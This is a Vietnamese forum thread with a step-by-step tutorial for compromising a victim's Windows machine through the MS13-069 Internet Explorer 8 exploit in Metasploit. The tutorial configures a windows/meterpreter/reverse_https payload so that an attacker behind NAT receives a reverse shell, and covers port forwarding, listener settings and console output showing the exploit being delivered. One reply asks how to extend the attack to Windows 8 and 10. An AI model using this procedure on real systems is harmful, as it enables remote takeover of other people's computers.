Hi all, Hôm nay mình đã trờ lại, và trong bài viết nhở này chúng ta sẽ xem xét làm thế nào để cấu hình một cách chính xác Meterpreter Payload và làm chúng hoạt động khi tấn công của bạn là phía sau NAT. Thậm chí nếu cả 2 mục tiêu là: hacker và nạn nhân đều phía sau NAT. Có lẽ tôi sẽ khai thác một trình duyệt để chứng minh điều này. Mô hình: Như các bạn có thể nhìn thấy. Cả hacker và nạn nhân là phía sau NAT, làm thế nào để đột nhập vào máy này bây giờ ???
Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác
Tiếp theo: Chúng ta sẽ giả định rằng đối phương có khả khả năng kết nối đến Internet qua Port 80 và 443 Tôi sẽ sử dụng Kali Linux như những kẻ tấn công, Metasploit thì đã có sẵn trên kali linux. Vui lòng chắc rằng bạn đã cập nhật Metasploit phiên bản mới nhất trên Kali Linux. Tôi sẽ khác thác trình duyệt Inetnet Explorer 8 vì nó đã lỗi thời và chứa rất nhiều lỗ hỏng bảo mật dễ bị tấn công Ý tưởng là để cấu hình Router/Firewall để traffic tới các IP Public (1.1.1.1) của Router sẽ được forward đến IP Hacker (192.168.0.187) trên các cổng 80 và 443. Vui lòng chắc chắn để kiểm tra xem cổng 80 và 443 không được sử dụng bởi Router/Firewall. Đầu tiên chúng ta cần xác minh rằng forwarding đang làm việc. Trên Kali tạo một tập tin hmtl nhở và lưu nó dưới /tmp Mã: [email protected]:~# cd /tmp [email protected]:/tmp# echo "It works" > test.html Từ thư mục chứa các file test.html chạy lệnh python này. Mã: [email protected]:/tmp# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... 192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /test.html HTTP/1.1" 200 - 192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found 192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 - 192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found 192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 - Nếu bây giờ bạn kết nối đến http://192.168.1.26:443/test.html bạn sẽ thấy: Bây giờ. Trên một máy tính bất kỳ ngoài Inetnet gõ http://1.1.1.1/test.html ( thay IP 1.1.1.1 bằng IP Public của bạn ) nếu bạn nhìn thấy trang này chứng tở forwarding đã được cấu hình chính xác và đang làm việc tốt. nếu không bạn cần kiểm tra lại cấu hình forwarding . Hướng dẫn cấu hình nằm ngoài phạm vi bài viết tôi để cho các bạn tự tìm hiểu Lưu ý: forwarding thì đang làm việc chính xác cho cả 2 cổng 80 và 443. test thêm điều này. Mã: [email protected]:~# cd /tmp [email protected]:/tmp# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 192.168.1.26 - - [04/Dec/2015 11:01:15] "GET /test.html HTTP/1.1" 200 - Metasploit Configruration Tôi sẽ sử dụng ms13_069_caret.rb để khai thác. Mã: msf > use exploit/windows/browser/ms13_069_caret msf exploit(ms13_069_caret) > show options Module options (exploit/windows/browser/ms13_069_caret): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 IE 8 on Windows XP SP3 msf exploit(ms13_069_caret) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms13_069_caret) > set URIPATH / URIPATH => / msf exploit(ms13_069_caret) > Kế tiếp chúng ta sẽ lựa chọn meterpreter reverse_https payload for windows. Chạy show options một lần nữa và chúng ta sẽ nhìn thấy điều này. Mã: msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(ms13_069_caret) > show options Module options (exploit/windows/browser/ms13_069_caret): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: ', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8443 yes The local listener port Exploit target: Id Name -- ---- 0 IE 8 on Windows XP SP3 msf exploit(ms13_069_caret) > msf exploit(ms13_069_caret) > set LPORT 443 LPORT => 443 msf exploit(ms13_069_caret) > set LHOST 1.55.109.2. ( YOUR IP PUBLIC) LHOST => 1.1.1.1 Mã: Chúng ta có thể nói cho nó biết để lắng nghe trên IP LAN [CODE] msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.1.26 ReverseListenerBindAddress => 192.168.1.26 Mã: msf exploit(ms13_069_caret) > exploit [*]Exploit running as background job. [*]Started HTTPS reverse handler on https://192.168.1.26:443/ [*]Using URL: http://0.0.0.0:80/ [*]Local IP: http://192.168.1.26:80/ [*]Server started. msf exploit(ms13_069_caret) > Nếu bây giờ chúng ta sử dụng IE 8 trên máy nạn nhân và kết nối với IP Public của Hacker. Chúng ta sẽ thấy điều này. Mã: msf exploit(ms13_069_caret) > [*]2.2.2.2 ms13_069_caret - Sending exploit... [*]2.2.2.2 ms13_069_caret - Sending exploit... [*]2.2.2.2:53893 Request received for /NtFT... [*]2.2.2.2:53893 Staging connection for target /NtFT received... [*]Patched user-agent at offset 663128... [*]Patched transport at offset 662792... [*]Patched URL at offset 662856... [*]Patched Expiration Timeout at offset 663728... [*]Patched Communication Timeout at offset 663732... Note: SRVHOST : 0.0.0.0 SRVPORT : set to the port where you want to host the browser exploit LHOST : the attacker public IP LPORT : set to the port where you want to serve the Meterpreter handler ReverseListenerBindAddress : LAN IP (optional)
Bạn có thể tham khảo bài viết của mình ở trên nhé. Nhưng bạn đã làm đồ án thành công trên win xp và win 7 nhờ hướng dẫn của mình. Mình đang tò mò là không biết bài nào nhỉ ? trên diễn đàn có rất nhiều bài của mình